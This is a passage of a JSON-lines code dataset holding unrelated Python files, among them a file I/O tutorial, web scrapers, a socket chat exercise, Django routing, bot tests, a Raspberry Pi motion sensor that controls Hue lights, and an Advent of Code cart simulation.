마지막으로 f.close()를 통해서 닫아주면 됩니다.\n# 하나씩 예시를 보겠습니다. * 주석 하나씩 해제해가며 진행합니다.\n\n# 파일에 문자열 덮어씌우기 : f.write(\"string\") w\nf = open(\"newFile.txt\", \"w\")\na = \"Hello Again Python!\"\nf.write(a)\nf.close()\n\n# 파일에 문자열 추가 : f.write(\"string\") a\nf = open(\"newFile.txt\", \"a\")\na = \"Added Line!\"\nf.write(a)\nf.close()\n\n# 파일을 초기화 : f.write(\"\") w\nf = open(\"newFile.txt\", \"w\")\na = \"\"\nf.write(a)\nf.close()\n\n# 파일에 배열 추가 : 'delimiter'.join(arr) a\nf = open(\"newFile.txt\", \"a\")\nf.write('\\n'.join(arr1))\nf.close()\n\n# 파일에 구분자 없�� 배열 한줄로 추가 : f.writelines(arr) a\nf = open(\"newFile.txt\", \"a\")\nf.write('\\n') # 위 데이터로부터 한 행 아래로 이동\nf.writelines(arr1) # WCDMA5GLTE 기록\nf.close\n\n# 파일 읽기1 (문자열 전체 반환) : f.read() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.read()\nf.close\nprint(text)\n\n# 파일 읽기2 (한줄씩 반환) : f.readline() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.readline()\nf.close\nprint(text) # 첫번째 줄만 반환됨\n# f.readline() 함수를 이용해 전체를 출력하려면 while, for 반복문을 사용하면 됨\nf = open(\"newFile.txt\", \"r\")\nwhile 1: # 무한반복 설정\n a = f.readline()\n if not a: # a 값에 None 값이 들어갈 때까지 출력\n break\n print(a)\n\n# 파일 읽기3 (리스트로 결과값을 반환) : f.readlines() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.readlines()\nf.close\nprint(text)\n","sub_path":"back_python_3_dataprocess1/1_python_matplotlib1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67392156","text":"# Visualization Util\n\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\nfrom utils.constants import *\n\n\ndef word_cloud_visulization(df_column, description, stopword=True):\n \"\"\"\n Word Cloud Visualization\n :param df_column:\n :param description:\n :param stopword:\n :return:\n \"\"\"\n comment_words = ''\n stopwords = ''\n if stopword:\n stopwords = set(STOPWORDS)\n\n # iterate through the csv file\n for val in df_column:\n\n # typecaste each val to string\n val = str(val)\n\n # split the value\n tokens = val.split()\n\n # Converts each token into lowercase\n for i in range(len(tokens)):\n tokens[i] = tokens[i].lower()\n\n comment_words += \" \".join(tokens) + \" \"\n\n wordcloud = WordCloud(width=300, height=300,\n background_color='white',\n stopwords=stopwords,\n min_font_size=10).generate(comment_words)\n\n # plot the WordCloud image\n plt.figure(figsize=(15, 15))\n plt.title(\"WordCloud of {} column\".format(description), fontdict=TITLE_FONT)\n plt.imshow(wordcloud, interpolation=\"bilinear\")\n plt.axis(\"off\")\n plt.show()\n","sub_path":"utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"529382524","text":"\"\"\"\n\n--- Exercise statement: N°22 - Walkie-Talkie\n\nEscribir dos programas que interactúen entre si como si fuesen clientes peer-to-peer. El funcionamiento será el\nsiguiente:\n\nLlamemos Alice al primer programa en ejecutarse, y Bob al segundo.\n\nAlice quedará escuchando un texto desde el otro programa.\n\nBob permitirá al usuario escribir por entrada estándar un mensaje. Al dar enter se enviará dicho mensaje a Alice,\nque lo mostrará por pantalla. Este paso se repetirá hasta que Bob envíe un mensaje con el texto “cambio”. En ese\nmomento Bob comenzará a escuchar desde el proceso Alice.\n\nAlice al recibir la palabra “cambio”, permitirá al usuario escribir texto por línea de comandos. Al dar enter los\nmensajes viajarán hasta Bob, que los mostrará por pantalla. Cuando Alice envíe un texto “cambio”, se invertirá\nnuevamente la secuencia.\n\nCuando cualquiera de los dos procesos envíe “exit” terminarán ambos.\n\nUtilice Sockets Inet Stream para comunicar ambos procesos.\n\ntag: walkie\n\n\"\"\"\n\nimport socket\nimport sys\nimport getopt\nimport time\n\n\ndef send(server_sock):\n goodbye = \"over and out\"\n while True:\n msg = input(\"\\nMessage to Alice: \")\n if msg.lower() == goodbye:\n server_sock.send(msg.encode())\n time.sleep(2)\n break\n else:\n server_sock.send(msg.encode())\n while True:\n data = server_sock.recv(1024).decode()\n if data.lower() != goodbye:\n print(f\"\\n>>> Alice says: {data}\")\n else:\n print(f\"\\n>>> Alice says: {data}\")\n time.sleep(2)\n break\n\n\ndef walkie_talkie(server_socket):\n while True:\n send(server_socket)\n\n\nif __name__ == '__main__':\n\n if len(sys.argv[1:]) <= 1:\n print(\"Usage:\\n python3 exercise22_bob.py -p \")\n else:\n host = \"\"\n port = 0\n\n (option, value) = getopt.getopt(sys.argv[1:], \"p:\")\n for (opt, val) in option:\n if opt == \"-p\":\n port = int(val)\n try:\n s_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n print('Failed to create socket')\n sys.exit()\n\n s_socket.connect((host, port))\n\n walkie_talkie(s_socket)\n","sub_path":"exercises/exercise22_bob.py","file_name":"exercise22_bob.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32932288","text":"import requests, bs4, re\n\nlogin = \"\"\nheslo = \"\"\njaskynaUrl = \"https://www.andor.cz/jeskyne/index.php?action=view&idJeskyne=18328\"\ntag = 'font color=\"gold\"' # tag ktory sa bude vyhladavat\n\nprispevkovNaStranku = 40 # default nastavenie kolko prispevkov v jaskyni na stranu zobrazujete\n\npouzitPostavu = False # True ak chcete pouzit postavu\npostavaId = \"115493/*/18328\" # ak chcete vyberat postavu\n\n\n\ndef vyberPostavu(session, postavaId):\n postava = {\"idckoPostavy\": postavaId}\n\n session.post(\"https://www.andor.cz/postava/switchpersons.php\", data=postava)\n\ndef main():\n loginInfo = {\n 'jmeno': login,\n 'kodename': heslo\n }\n prispevky = []\n goldPattern = re.compile(r'{}'.format(tag))\n\n\n with requests.Session() as session:\n res = session.post(\"https://www.andor.cz/login.php\", data=loginInfo)\n\n if pouzitPostavu:\n vyberPostavu(session, postavaId)\n\n jeskyn = session.get(jaskynaUrl)\n andor = bs4.BeautifulSoup(jeskyn.text, \"html.parser\")\n\n getPrispevkyCountPattern = re.compile(r'(\\d+)')\n\n prispevkyCount = int(re.search(getPrispevkyCountPattern, andor.find(\"div\", id=\"pocetPrispevku\").text).group(1))\n print(\"Prispevkov spolu: \", prispevkyCount)\n\n # print(andor.find(\"div\", id=\"formularPrispevek\"))\n\n i = 0\n while i * prispevkovNaStranku < prispevkyCount:\n\n strankaJeskyneUrl = jaskynaUrl + \"&from={}&page=1\".format(prispevkovNaStranku * i)\n strankaJeskyne = session.get(strankaJeskyneUrl)\n\n for prispevok in bs4.BeautifulSoup(strankaJeskyne.text, \"html.parser\").find_all(\"table\", class_=\"prispevek\" ):\n if re.search(goldPattern, str(prispevok)) is not None:\n prispevky.append(prispevok)\n\n i += 1\n\n print(\"Prispevkov s danym tagom: \", len(prispevky))\n\n with open(\"filtrovane_prispevky.html\", \"w\") as f:\n\n f.write(\"\")\n\n with open(\"head.txt\") as head:\n f.writelines(head.readlines())\n\n\n f.write(\"\")\n\n for prispevok in prispevky:\n f.write(str(prispevok))\n\n f.write(\"\")\n\n f.write(\"\")\n\n\nprint(\"Andor prispevky stahovac a filtrovac\")\nprint(\"Nič nie je garantované\")\nprint(\"Chybne zadaný vstup pravdepodobne spôsobí pád programu\")\n\nmain()\n","sub_path":"postFilter/prispevkyGetter.py","file_name":"prispevkyGetter.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"602971119","text":"\"\"\"Proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.views.static import serve\n\nfrom Proj import settings\nfrom app1 import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('get_valid_image/', views.get_valid_image), # 获取图形验证码\n path('login/', views.login), # 登录\n path('register/', views.register), # 注册\n path('index/', views.index), # 首页\n path(\"updatecode/\",views.updatecode), #修改密码\n re_path(r'staff/(?P.*)$', views.staff),\n re_path(r'administrator/(?P.*)$', views.administrator),\n re_path(r'firm/(?P.*)$', views.firm),\n re_path(r'media/(?P.*)$', serve, {\"document_root\": settings.MEDIA_ROOT}), # 获取media资源\n # re_path(r'static/(?P.*)$', serve, {\"document_root\": settings.STATIC_ROOT}), # 获取static资源\n\n path('logout/', views.logout),\n path(\"introduce/\",views.introduce)\n\n]\n","sub_path":"Proj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648970894","text":"\n\ndef computeMeanRating(filename):\n ratings = []\n\n try:\n f = open('../ml-latest-small/' + filename, 'r')\n except:\n print('File couldnt be read or found')\n raise\n finally:\n for line in f:\n columns = line.split(\",\")\n if columns[2] != \"rating\":\n ratings.append(float((columns[2])))\n\n f.close()\n\n n = len(ratings)\n # sorting for median\n ratings.sort()\n\n # calculating Arithmetic Mean\n mean = calcArithmeticMean(ratings, n)\n\n # calculating Median\n\n median = calcMedian(ratings, n)\n\n # calculating mode\n mode = calcMode(ratings)\n\n return mean, median, mode\n\ndef calcMode(ratings):\n #Creating an Map where the amount of each number will be stored\n numCount = {}\n highestNum = 0\n\n #Fill the Map with the numbers which appear in the List\n for i in ratings:\n #if the number already appears in the list count up\n if i in numCount.keys():\n numCount[i] += 1\n #else add the new number to the map\n else:\n numCount[i] = 1\n\n #check which number appears most often\n for i in numCount.keys():\n if numCount[i] > highestNum:\n highestNum = numCount[i]\n mode = i\n if highestNum != 1:\n return mode\n #case if every number only appears once\n elif highestNum == 1:\n print(\"All numbers in the list appear once.\")\n return -1\n\ndef calcMedian(ratings, n):\n\n # calculating the median\n if n % 2 != 0:\n median = ratings[int(n / 2)]\n else:\n # case when the len of the data is even.\n median = float((ratings[int((n - 1) / 2)] + ratings[int(n / 2)]) / 2.0)\n return median\n\ndef calcArithmeticMean(ratings, n):\n sum = 0\n for i in ratings:\n sum += i\n ## calculating arithmetic mean\n average = sum / n\n # round arithmetic to 5 digits\n average = round(average, 5)\n return average\n\n\nif __name__ == '__main__':\n print (computeMeanRating(\"ratings.csv\"))\n","sub_path":"assignment1/src/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"264852721","text":"from typing import Type, Optional\n\nimport pytest\nfrom nonebug import App\n\n\n@pytest.mark.asyncio\nasync def test_on(app: App, load_plugin):\n import nonebot\n import plugins.plugin.matchers as module\n from nonebot.typing import T_RuleChecker\n from nonebot.matcher import Matcher, matchers\n from nonebot.rule import (\n RegexRule,\n IsTypeRule,\n CommandRule,\n EndswithRule,\n KeywordsRule,\n FullmatchRule,\n StartswithRule,\n ShellCommandRule,\n )\n from plugins.plugin.matchers import (\n TestEvent,\n rule,\n state,\n handler,\n priority,\n matcher_on,\n permission,\n expire_time,\n matcher_on_type,\n matcher_sub_cmd,\n matcher_group_on,\n matcher_on_regex,\n matcher_on_notice,\n matcher_on_command,\n matcher_on_keyword,\n matcher_on_message,\n matcher_on_request,\n matcher_on_endswith,\n matcher_on_fullmatch,\n matcher_on_metaevent,\n matcher_group_on_type,\n matcher_on_startswith,\n matcher_sub_shell_cmd,\n matcher_group_on_regex,\n matcher_group_on_notice,\n matcher_group_on_command,\n matcher_group_on_keyword,\n matcher_group_on_message,\n matcher_group_on_request,\n matcher_on_shell_command,\n matcher_group_on_endswith,\n matcher_group_on_fullmatch,\n matcher_group_on_metaevent,\n matcher_group_on_startswith,\n matcher_group_on_shell_command,\n )\n\n plugin = nonebot.get_plugin(\"plugin\")\n\n def _check(\n matcher: Type[Matcher],\n pre_rule: Optional[T_RuleChecker],\n has_permission: bool,\n ):\n assert {dependent.call for dependent in matcher.rule.checkers} == (\n {pre_rule, rule} if pre_rule else {rule}\n )\n if has_permission:\n assert {dependent.call for dependent in matcher.permission.checkers} == {\n permission\n }\n else:\n assert not matcher.permission.checkers\n assert [dependent.call for dependent in matcher.handlers] == [handler]\n assert matcher.temp is True\n assert matcher.expire_time == expire_time\n assert matcher in matchers[priority]\n assert matcher.block is True\n assert matcher._default_state == state\n\n assert matcher.plugin is plugin\n assert matcher.module is module\n assert matcher.plugin_name == \"plugin\"\n assert matcher.module_name == \"plugins.plugin.matchers\"\n\n _check(matcher_on, None, True)\n _check(matcher_on_metaevent, None, False)\n _check(matcher_on_message, None, True)\n _check(matcher_on_notice, None, False)\n _check(matcher_on_request, None, False)\n _check(matcher_on_startswith, StartswithRule((\"test\",)), True)\n _check(matcher_on_endswith, EndswithRule((\"test\",)), True)\n _check(matcher_on_fullmatch, FullmatchRule((\"test\",)), True)\n _check(matcher_on_keyword, KeywordsRule(\"test\"), True)\n _check(matcher_on_command, CommandRule([(\"test\",)]), True)\n _check(matcher_on_shell_command, ShellCommandRule([(\"test\",)], None), True)\n _check(matcher_on_regex, RegexRule(\"test\"), True)\n _check(matcher_on_type, IsTypeRule(TestEvent), True)\n _check(matcher_sub_cmd, CommandRule([(\"test\", \"sub\")]), True)\n _check(matcher_sub_shell_cmd, ShellCommandRule([(\"test\", \"sub\")], None), True)\n _check(matcher_group_on, None, True)\n _check(matcher_group_on_metaevent, None, False)\n _check(matcher_group_on_message, None, True)\n _check(matcher_group_on_notice, None, False)\n _check(matcher_group_on_request, None, False)\n _check(matcher_group_on_startswith, StartswithRule((\"test\",)), True)\n _check(matcher_group_on_endswith, EndswithRule((\"test\",)), True)\n _check(matcher_group_on_fullmatch, FullmatchRule((\"test\",)), True)\n _check(matcher_group_on_keyword, KeywordsRule(\"test\"), True)\n _check(matcher_group_on_command, CommandRule([(\"test\",)]), True)\n _check(matcher_group_on_shell_command, ShellCommandRule([(\"test\",)], None), True)\n _check(matcher_group_on_regex, RegexRule(\"test\"), True)\n _check(matcher_group_on_type, IsTypeRule(TestEvent), True)\n","sub_path":"tests/test_plugin/test_on.py","file_name":"test_on.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"570496013","text":"#!/usr/bin/env python3\nimport codecs\nf_input = open('data.txt','r')\n\n# FOR SMALL FILES:\ncount = len(f_input.readlines())\nf_input.seek(0)\n\n# IF THE FILE IS TOO LARGE:\n#count = -1\n#for count, line in enumerate(codecs.open('data.txt','rU','utf-8')):\n# pass\n#count += 1\n#print(count)\n\n# FOR WINDOWS FILES:\n#count = 0\n#input_file = codecs.open('data.txt','rb','utf-8')\n#while (True):\n# buffer = input_file.read(8192*1024)\n# if not buffer:\n# break\n# count += buffer.count('\\n')\n#count += 1\n#input_file.close()\n#print(count)\n","sub_path":"calc_lines.py","file_name":"calc_lines.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"58848460","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nimport itertools\nimport string\nimport csv\n\ncategories = [\n 'russia', \n 'world', \n 'economics', \n 'forces', \n 'science', \n 'culture', \n 'sport', \n 'media', \n 'travel'\n ]\n\ndef get_html(url):\n html_links = {}\n for category in categories:\n url1 = url+'/rubrics/'+category\n print(url1)\n html_page_link = requests.get(url1)\n print('debug2')\n html_page = html_page_link.text\n soup = BeautifulSoup(html_page, 'html.parser')\n print('debug3')\n all_news = soup.find_all('div', class_='item')\n print('debug4')\n links = []\n for new in all_news[0:9]:\n url2 = new.a.get('href')\n links.append(url+url2)\n html_links[category] = links\n return html_links\n\ndef get_lenta_news(link):\n html_single_new_page = requests.get(link).text\n soup = BeautifulSoup(html_single_new_page, 'html.parser')\n all_news = soup.find_all('p')\n news_words_list = []\n for new in all_news:\n s = str(new.text).lower()\n a1 = s.translate(str.maketrans('', '', r\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~»«0123456789—\"\"\")).split()\n for element in a1:\n news_words_list.append(element)\n return news_words_list\n\nhtml1 = get_html(\"https://lenta.ru\")\n\nfor category, links in html1.items():\n name_file = category+'.csv'\n # print(name_file)\n category_words_list = []\n for link in links:\n words_in_text = get_lenta_news(link)\n category_words_list.extend(words_in_text)\n # print(category_words_list)\n category_words_list_iterabled = list(itertools.chain(category_words_list))\n # print(category_words_list_iterabled)\n counts = Counter(category_words_list)\n counts_20_max = counts.most_common(20)\n # print(category, counts_20_max)\n \n with open(name_file, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(counts_20_max)\n\n\n \n \n ","sub_path":"lenta.py","file_name":"lenta.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"543250528","text":"import heapq\n\ndef solution(scoville, K):\n answer = 0\n num = 0\n heapq.heapify(scoville)\n while (scoville[0] 页数\n :param page_size: 一页返回多少条记录\n :param order: 排序\n :param ignores: 忽略的字段\n :param kwargs: title/url/admin/client_ip/log_type/error/start_time/end_time\n log_type 默认 0; error 默认 -1, start_time/end_time 格式yyyy-mm-dd\n '''\n query = self._query(kwargs)\n query = tuple(query) or None\n data = self.find_all(query=query, order=order,\n ignores=ignores, fmt=False)\n return self.pager(data, page=page, page_size=page_size, **kwargs)\n\nadmin_log_serv = AdminLogService()\n","sub_path":"core/service/serv_admin_log.py","file_name":"serv_admin_log.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"302383981","text":"# Import RPi.GPIO to use the GPIO pins\nimport RPi.GPIO as GPIO\n# Import time to enable sleeping\nimport time\n# Import reqests to communicate with the Hue API and\n# json to do JSON stuff\nimport requests, json\n# Import os to get the programs PID\n# , signal to catch SIGTERM and sys to exit Python\nimport os, signal, sys\n# Import PyMysql to do Mysql stuff\nimport pymysql\n# Import logging to do logging\nimport logging\n# Import argv from sys to handle arguments passed \n# to the program\nfrom sys import argv\n\n# Set some basic configuration of the logging\n##\n# format='%(asctime)s %(levelname)s:%(message)s' sets the format \n# of the log message.\n# In this case it is '[time] [message loglevel]:[message]\n# datefmt='%d/%m/%Y %H:%M:%S' sets the format of the timestamp\n# In this case it is day, month (as a number), \n# year (as a four digit number), space, hour (24-hour clock), seconds\n##\n# filename='pirHueLog.log' sets the filename of the logging file\n##\n# Additional parameter level=logging.DEBUG sets the logging level\n# (default is WARNING)\n# Available logging levels are (in ascending order) DEBUG, INFO\n# , WARNING, ERROR, CRITICAL\n# Additional parameter filemode='w' sets the filemode.\n# w means overwrite. Default is append\nif len( sys.argv ) == 1:\n loggingLevel = \"CRITICAL\"\nelse:\n scriptName, loggingLevel = argv\nnumericLogLevel = getattr( logging, loggingLevel.upper(), None )\nif not isinstance( numericLogLevel, int ):\n raise ValueError( \"Invalid log level: {0}\".format( loggingLevel ) )\nlogging.basicConfig( \n format='%(asctime)s %(levelname)s %(message)s'\n , datefmt='%d/%m/%Y %H:%M:%S'\n , filename='pirHueLog.log'\n , level=numericLogLevel\n , filemode='w' )\n\n# The number of the pin that the input is connected to\nsensor = 4\n\n# Set the mode that is used to count the pins on the board\nGPIO.setmode( GPIO.BCM )\n# Initialize the pin as an input pin. \n# Set the starting state to DOWN (false)\nGPIO.setup( sensor, GPIO.IN, GPIO.PUD_DOWN )\n\n# Fetch config details from file \ntry:\n with open( \"config.json\", \"r\" ) as configFile:\n # usersDict is now a dictionary with a list with a dictonary\n configData = json.load( configFile )\nexcept FileNotFoundError as err:\n print( \"File not found.\\n Error message: {0}\".format( err ) )\n\n# Assign config variables\ndbHost = configData[\"mysql\"][\"host\"]\ndbUser = configData[\"mysql\"][\"user\"]\ndbPassword = configData[\"mysql\"][\"password\"]\ndbDatabase = configData[\"mysql\"][\"database\"]\nhueUser = configData[\"hue\"][\"userID\"]\nhueIp = \"192.168.1.100\"\nhueApi = \"http://\" + hueIp + \"/api/\" + hueUser\n\n# Logging the config variables\nlogging.debug( \"dbHost = {0}\".format( dbHost ) )\nlogging.debug( \"dbUser = {0}\".format( dbUser ) )\nlogging.debug( \"dbPassword = {0}\".format( \"[REDACTED]\" ) )\nlogging.debug( \"dbDatabase = {0}\".format( dbDatabase ) )\nlogging.debug( \"hueUser = {0}\".format( hueUser ) )\nlogging.debug( \"hueIp = {0}\".format( hueIp ) )\nlogging.debug( \"hueApi = {0}\".format( hueApi ) )\n\n### PyMysql\ndef insertIntoTable( eventText ):\n \"\"\"\n Inserts a row into the database table PIRHUELOG.\n Writes parameter eventText to the DB-column EVENT.\n \"\"\"\n global dbUser, dbHost, dbPassword, dbDatabase\n connection = pymysql.connect( \n host = dbHost, user = dbUser\n , password = dbPassword\n , db = dbDatabase )\n with connection.cursor() as cursor:\n sql = \"insert into pirHueLog ( event ) values ( %s )\"\n cursor.execute( sql, ( eventText ) )\n connection.commit()\n connection.close()\n###\n\ndef terminateReceived( signalnumber, stackFrame ):\n \"\"\"\n When a termination signal is received (through kill),\n this function makes sure the program cleans up after itself\n \"\"\"\n logging.debug( \"Cleaning up GPIO\" )\n GPIO.cleanup()\n # Deletes the PID file\n logging.debug( \"Deleting the pid file\" )\n os.unlink( \"pid.txt\" )\n # Exits Python\n logging.debug( \"Exiting Python\" )\n sys.exit(0)\n return\n\n# Set the handler that is called when SIGTERM is received\nsignal.signal( signal.SIGTERM, terminateReceived )\n\n# Write PID to file. Can only write string, not int\npid = str( os.getpid() )\nlogging.debug( \"Writing PID to file. PID is {0}\".format( pid ) )\nwith open( \"pid.txt\", \"w\" ) as pidFile:\n pidFile.write( pid )\n\ndef waitForRise( waitingTime ):\n \"\"\"\n Waits for a rising edge\n Returns True if a rising edge is detected, False otherwise\n Parameter waitingTime defines how many milliseconds the\n function waits before timing out\n \"\"\"\n global sensor\n # A channel can only have one event detection.\n # Need to remove the original one so that I can add one that\n # waits for rising edges\n # This event detection is only used in this function\n GPIO.remove_event_detect( sensor )\n # Waits for a rising edge.\n # Times out after [waitingTime] milliseconds\n waiting = GPIO.wait_for_edge( \n sensor, GPIO.BOTH\n , timeout = waitingTime )\n if waiting is None: # wait_for_edge returns None if it times out\n # Removes the temporary event detection\n GPIO.remove_event_detect( sensor )\n # Adds event detection for both rising and falling edges\n GPIO.add_event_detect( \n sensor\n , GPIO.BOTH\n , callback = callbackFunc )\n return False # No new rising edge detected\n else:\n GPIO.remove_event_detect( sensor )\n GPIO.add_event_detect( \n sensor\n , GPIO.BOTH\n , callback = callbackFunc )\n return True # Rising edge detected\n\ndef getHueState():\n \"\"\"\n Returns the current state of the light;\n True if on, False otherwise\n \"\"\"\n logging.debug( \"Getting light state\" )\n hueResponse = requests.get( hueApi + \"/lights/5/\" )\n hueState = hueResponse.json()['state']['on']\n return hueState\n\ndef callbackFunc( sensor ):\n \"\"\"\n Callback function, is called whenever an edge is detected\n \"\"\"\n # Movement and light is off\n if GPIO.input( sensor ) and not getHueState():\n logging.debug( \"Movement detected while the light is off\" )\n logging.debug( \"Turning the light on\" )\n putResponse = requests.put( \n hueApi + \"/lights/5/state\", '{ \"on\": true }' )\n insertIntoTable( 'Light on' )\n # No movement and light is on\n elif not GPIO.input( sensor ) and getHueState():\n if waitForRise( 600000 ):\n # If the light has been turned off externally,\n # I need to turn it back on\n callbackFunc( sensor )\n else:\n logging.debug( \"Turning the light off\" )\n putResponse = requests.put( \n hueApi + \"/lights/5/state\", '{ \"on\": false }' )\n insertIntoTable( 'Light off' )\n\n# Add event detect with callback\nGPIO.add_event_detect( sensor, GPIO.BOTH, callback = callbackFunc )\n\n# Infinite loop. Does nothing\nlogging.info( \"Starting\" )\nwhile 1:\n time.sleep( 1 )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"546881127","text":"# Refer: https://blog.csdn.net/a19990412/article/details/105940446\n# pip install piexif -i https://pypi.tuna.tsinghua.edu.cn/simple/\n#step1: 遍历所有图片,筛选有问题的\nimport os\nfrom PIL import Image\nimport cv2\nimport warnings\n\nwarnings.filterwarnings('error')\n\nroot = './train'\n\nf1 = open('pExifError.txt', 'w')\nf2 = open('rgbaError.txt', 'w')\nf3 = open('ExifError.txt', 'w')\nf4 = open('4chImg.txt', 'w')\nf5 = open('WebpError.txt', 'w')\nf6 = open('UnknownError.txt', 'w')\n\nidx = 0\nfor r, d, files in os.walk(root):\n if files != []:\n for i in files:\n fp = os.path.join(r, i)\n try:\n img = Image.open(fp)\n if (len(img.split()) != 3):\n # print('4CH:', fp)\n f4.write('{}\\n'.format(fp))\n\n except Exception as e:\n print('Error:', str(e))\n print(fp)\n if 'Possibly corrupt EXIF data' in str(e):\n print('Exif error')\n f1.write('{}\\n'.format(fp))\n elif 'Palette images with Transparency' in str(e):\n print('rgba error')\n f2.write('{}\\n'.format(fp))\n elif 'Corrupt EXIF data' in str(e):\n print('pExif error')\n f3.write('{}\\n'.format(fp))\n elif 'image file could not be identified because WEBP' in str(e):\n print('Webp error')\n f5.write('{}\\n'.format(fp))\n else:\n print('Unknown error')\n f6.write('{}\\n'.format(fp))\n\n if idx % 5000 == 0:\n print('=' * 20, idx)\n\n idx += 1\n\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()\n\n","sub_path":"data/data_clean1.py","file_name":"data_clean1.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"524157732","text":"import unittest\n\n\ndef input_file():\n # return the input_test file in a text\n file = open('input', 'r')\n lines = [line.rstrip('\\n') for line in file]\n file.close()\n return lines\n\n\ndef output_file():\n # read line of output_1 file\n file = open('output', 'r')\n res = file.read()\n file.close()\n return res\n\n\nclass Cart:\n \"\"\"\n A cart is represented by his coordonate and his direction,\n its moves are specific during an intersection.\n \"\"\"\n def __init__(self, y, x, direction, map, per_intersection_memory=0):\n \"\"\"\n\n :param y: the coordonate y from 0 to n to the down\n :param x: the coordonate x from 0 to n to the right\n :param direction: the direction representing as a pick of an arrow\n \"\"\"\n self.y = y\n self.x = x\n self.direction = direction\n self.map = map\n self.per_intersection_memory = per_intersection_memory\n\n def get_direction(self):\n \"\"\"\n This function is useful to get that attribute\n :return: direction of the cart to know where it will go\n \"\"\"\n return self.direction\n\n def get_per_intersection_memory(self):\n # get the current intersection memory\n return self.per_intersection_memory\n\n def get_position_yx(self):\n \"\"\"\n Get the position of the cart\n :return: the position y x of the current cart\n \"\"\"\n return self.y, self.x\n\n def go_east(self):\n \"\"\"\n This function permit us to the move the at the right\n \"\"\"\n self.x += 1\n\n def go_north(self):\n \"\"\"\n This function permit us to move the cart up\n \"\"\"\n self.y -= 1\n\n def go_west(self):\n \"\"\"\n This function permit us to the move the at the left\n \"\"\"\n self.x -= 1\n\n def go_south(self):\n \"\"\"\n This function permit us to move the cart down\n \"\"\"\n self.y += 1\n\n def direction_south(self):\n self.direction = \"v\"\n\n def direction_east(self):\n self.direction = \">\"\n\n def direction_north(self):\n self.direction = \"^\"\n\n def direction_west(self):\n self.direction = \"<\"\n\n def go_right(self):\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.direction_south()\n elif current_direction == \"^\":\n self.direction_east()\n elif current_direction == \"<\":\n self.direction_north()\n else:\n self.direction_west()\n\n def go_straight(self):\n # nothing to change\n pass\n\n def go_left(self):\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.direction_north()\n elif current_direction == \"^\":\n self.direction_west()\n elif current_direction == \"<\":\n self.direction_south()\n else:\n self.direction_east()\n\n def incr_per_intersection_memory(self):\n self.per_intersection_memory = (self.per_intersection_memory + 1) % 3\n\n def update_direction(self):\n \"\"\"\n This function permits to update the direction using the current case\n \"\"\"\n next_case_coord = self.y, self.x\n next_case = self.map[next_case_coord[0]][next_case_coord[1]]\n direction = self.get_direction()\n if next_case == \"+\":\n if self.per_intersection_memory == 0:\n self.go_left()\n elif self.per_intersection_memory == 1:\n self.go_straight()\n else:\n self.go_right()\n self.incr_per_intersection_memory()\n elif next_case == \"/\":\n if direction == \">\":\n self.direction_north()\n elif direction == \"^\":\n self.direction_east()\n elif direction == \"<\":\n self.direction_south()\n else:\n self.direction_west()\n elif next_case == \"\\\\\":\n if direction == \">\":\n self.direction_south()\n elif direction == \"^\":\n self.direction_west()\n elif direction == \"<\":\n self.direction_north()\n else:\n self.direction_east()\n\n def move(self):\n \"\"\"\n This function calculate the next position of the cart and move it\n \"\"\"\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.go_east()\n elif current_direction == \"^\":\n self.go_north()\n elif current_direction == \"<\":\n self.go_west()\n else:\n self.go_south()\n self.update_direction()\n\n\ndef find_all_direction(line, y, direction):\n finder = False\n x = 0\n # direction\n # first iteration\n while line.find(direction, x) != -1:\n x = line.find(direction, 